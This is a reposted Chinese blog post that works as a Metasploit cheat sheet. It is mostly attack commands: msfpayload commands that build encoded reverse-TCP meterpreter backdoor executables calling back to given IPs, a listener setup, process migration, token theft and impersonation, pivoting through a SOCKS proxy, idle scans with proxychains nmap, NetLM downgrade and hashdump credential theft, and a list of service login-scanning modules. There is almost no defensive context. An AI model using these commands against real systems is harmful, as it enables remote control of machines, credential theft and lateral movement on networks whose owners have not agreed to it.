【转载】metasploit使用模块

反弹的shell,这里介绍两种payload:
Windows/meterpreter/reverse_tcp
Windows/meterpreter/reverse_https  windows/meterpreter/reverse_http
生成反弹后门:
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=443 R | \msfencode –b ‘’ -t exe -o root/Desktop/sx.exe
msfpayload windows/meterpreter/reverse_tcp LHOST=202.96.1.135 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe >  /root/Share/msf.exe
设置监听:
msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 183.11.80.233
msf  exploit(handler) > set LPORT 443
msf  exploit(handler) > exploit
迁移到稳定进程:
ps    //查看主机进程PID
migrate PID   //迁移到指定的进程ID
假冒主机已登录用户:
use incognito         //加载incognito功能(用来盗窃目标主机的令牌或假冒用户)
list_tokens -u          //列出目标主机用户的可用令牌
list_tokens -g          //列出目标主机用户组的可用令牌
impersonate_token DOMAIN_NAME\\USERNAME       //假冒目标主机上的可用令牌
steal_token PID      //盗窃给定进程的可用令牌并进行令牌假冒
drop_token             //冒当前令牌


查看网段:
ifconfig
查看域控:
meterpreter > run post/windows/gather/enum_domain
[+] FOUND Domain: dis9 (域)
[+] FOUND Domain Controller: dis9team-Domain (IP: 1.1.1.10) (域控IP)
查看网络接口:

meterpreter > route
meterpreter > run get_local_subnets
(meterpreter > background 后台运行SESSION)
添加路由至本地:
msf  exploit(handler) > route add 192.168.15.0 255.255.255.0 1 (1为SESSION ID)
msf  exploit(handler) > route print (列出路由)
开SOCKS代理:
msf  exploit(handler) > use auxiliary/server/socks4a
msf  auxiliary(socks4a) > exploit
使用Proxychains连接代理:
编辑proxychains.conf:sudo gedit /etc/proxychains.conf
连接代理:proxychains nc -vv 192.168.15.100 445
代理使用NMAP:
proxychains nmap -sT -Pn 192.168.1.108
在这里便可以看到nmap已经正常运行了. 在这里如果不加-sT 参数 或者是用 其他扫描方式便会出错 比如-sS etc.话说这个问题困扰了我很长时间,google了一番之后发现

Proxychains allows TCPand DNS tunneling through proxies. Be aware that Proxychains only tunnels TCPand DNS; in other words, avoid using UDP and host discovering through ICMP(ping).
在这里运行nmap之前可以先扫扫c段中的tcp空连接,然后就可以使用nmap进行tcp空链接扫描.这样便可以进行伪装工作,模块是这个.(具体用法请show options 或info)
auxiliary/scanner/ip/ipidseq
然后nmap中使用 -sI 参数选择空闲主机
nmap -sT -Pn -A -sI 192.168.1.101 192.168.1.108
-sT tcp扫描,-Pn 不进行ping,-A 显示更详细的信息.-sI 指定空闲主机
//////////////////////////////////////////////////////////////
获取HASH模块:
use ost/windows/manage/netlm_downgrade (多用户可用incognito切换用户来获取不同用户的HASH)
msf post(netlm_downgrade)  >  set session 1
msf post(netlm_downgrade)  >  set SMBHOST 192.168.1.2
msf post(netlm_downgrade)  >  run
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
use post/windows/gather/hashdump(可获取全部用户hash)
msf post(hashdump)  >  set SESSION 1
msf post(hashdump)  >  exploit
msf post(hashdump)  >  creds(查看保存在数据库里面的hash)
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
metaspliot常见探测服务模块:

端口扫描
auxiliary/scanner/portscan
scanner/portscan/ack        ACK防火墙扫描
scanner/portscan/ftpbounce  FTP跳端口扫描
scanner/portscan/syn        SYN端口扫描
scanner/portscan/tcp        TCP端口扫描
scanner/portscan/xmas       TCP"XMas"端口扫描
smb扫描
smb枚举auxiliary/scanner/smb/smb_enumusers
返回DCERPC信息auxiliary/scanner/smb/pipe_dcerpc_auditor
扫描SMB2协议auxiliary/scanner/smb/smb2
扫描smb共享文件auxiliary/scanner/smb/smb_enumshares
枚举系统上的用户auxiliary/scanner/smb/smb_enumusers
SMB登录auxiliary/scanner/smb/smb_login
SMB登录use windows/smb/psexec
扫描组的用户auxiliary/scanner/smb/smb_lookupsid
扫描系统版本auxiliary/scanner/smb/smb_version
mssql扫描(端口tcp1433udp1434)
admin/mssql/mssql_enum     MSSQL枚举
admin/mssql/mssql_exec     MSSQL执行命令
admin/mssql/mssql_sql      MSSQL查询
scanner/mssql/mssql_login  MSSQL登陆工具
scanner/mssql/mssql_ping   测试MSSQL的存在和信息
另外还有一个mssql_payload的模块 利用使用的
smtp扫描
smtp枚举auxiliary/scanner/smtp/smtp_enum 
扫描smtp版本auxiliary/scanner/smtp/smtp_version
snmp扫描
通过snmp扫描设备auxiliary/scanner/snmp/community
ssh扫描
ssh登录auxiliary/scanner/ssh/ssh_login
ssh公共密钥认证登录auxiliary/scanner/ssh/ssh_login_pubkey
扫描ssh版本测试auxiliary/scanner/ssh/ssh_version
telnet扫描
telnet登录auxiliary/scanner/telnet/telnet_login 
扫描telnet版本auxiliary/scanner/telnet/telnet_version
tftp扫描
扫描tftp的文件auxiliary/scanner/tftp/tftpbrute
ftp版本扫描scanner/ftp/anonymous
ARP扫描
auxiliary/scanner/discovery/arp_sweep
扫描UDP服务的主机auxiliary/scanner/discovery/udp_probe
检测常用的UDP服务auxiliary/scanner/discovery/udp_sweep
sniffer密码auxiliary/sniffer/psnuffle
snmp扫描scanner/snmp/community
vnc扫描无认证扫描scanner/vnc/vnc_none_auth

 

posted @ 2015-12-22 17:25  blck  阅读(1349)  评论(0编辑  收藏  举报